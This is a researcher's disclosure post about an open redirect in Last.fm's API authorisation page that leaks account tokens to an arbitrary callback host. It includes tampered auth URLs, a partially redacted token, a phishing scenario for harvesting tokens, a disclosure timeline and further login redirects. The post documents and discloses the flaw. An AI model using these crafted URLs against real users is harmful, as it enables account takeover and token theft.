Last.fm - Open redirect leading to API token leak
home | talks | posts | projects | hardware | contact
tl;dr - open redirects still exist in 2025 and can have more impact than just phishing - this one gives API access to the account
what's Last.fm?
Last.fm is a music tracking website primarily used for tracking listening statistics. it's commonly integrated with discord bots
what's the vulnerability?
i was using OpenScrobbler to add listens for some songs i had listened to which hadn't been picked up by last.fm. when logging in, i was redirected to this page:
(quick note: OpenScrobbler is not vulnerable or at fault - i am just using their site as an example)
the URL contains a callback parameter back to the OpenScrobbler site. when i see something like this, i like to give it a quick check just for fun. i replaced openscrobbler.com with example.com, like this:
https://www.last.fm/api/auth?api_key=0aa2e9944f3e38f7a64358dde668ff63&cb=https://openscrobbler.com/
to:
https://www.last.fm/api/auth?api_key=0aa2e9944f3e38f7a64358dde668ff63&cb=https://example.com/
the site still looked the same:
when i clicked "YES, ALLOW ACCESS", i was redirected to the following URL (parameter has been partially redacted):
https://example.com/?token=LgmrLbU5Li7RyruFHXXXXXXXXXXXXXXX
in another completely separate browser instance, i appended the token to the intended site:
https://openscrobbler.com/?token=LgmrLbU5Li7RyruFHXXXXXXXXXXXXXXX
i was now logged in to the OpenScrobbler site and could perform actions on the user's account.
what just happened?
in the vulnerable Last.fm page:
https://www.last.fm/api/auth?api_key=0aa2e9944f3e38f7a64358dde668ff63&cb=https://openscrobbler.com/
the api_key parameter is the public Last.fm API key associated with OpenScrobbler.
when redirecting to the callback URL, which we changed to example.com, the token parameter (LgmrLbU5Li7RyruFHXXXXXXXXXXXXXXX) was appended to the URL. this token is an API key for the authenticated Last.fm account.
if we use a site we control instead of example.com, and a user clicked "YES, ALLOW ACCESS" on a tampered URL we would receive a request containing the token (LgmrLbU5Li7RyruFHXXXXXXXXXXXXXXX), and could use this to gain API access to the user's account. we could then redirect the user back to a valid login page to authenticate to OpenScrobbler to avoid suspicion.
what can you do with this?
after receiving an authentication token, according to the Last.fm API, we have 60 minutes to use it to retrieve a session, and then our retrieved session will be valid forever:
some things we can do with the compromised user API token include:
- Add listens to tracks
- Favourite/unfavourite tracks
- Add or remove tags from tracks, albums, and artists
timeline
2025
- June 29: Emailed asking for a disclosure process or a form/contact email for sending details to
- July 3: Followed up on this
- July 7: Last.fm responds, "Thank you for contacting Last.fm. Please contact our Support Team at [Salesforce Contact Support page]."
- July 7: Created a case asking where to send details to, as the form did not have any option for security disclosures (only account/billing issues and reporting abuse)
- July 11: Last.fm responds, "Thank you for your email. Please send the details to [email protected]."
- July 11: I send an email containing the vulnerability details including detailed reproduction steps to [email protected], I mention that I plan to disclose these after 90 days has passed
- July 22: I follow up asking if there are any updates
- August 8: I follow up asking if there are any updates
- September 3: I follow up asking if there are any updates
2026
- June 2: Post published
(no response or communication after the disclosure)
bonus round!
i also disclosed that while https://www.last.fm/login?next=https://example.com is properly handled and won't redirect to example.com if you haven't yet logged in, it immediately redirects you if you are authenticated. while writing this i also noticed this also applies to https://www.last.fm/join?next=https://example.com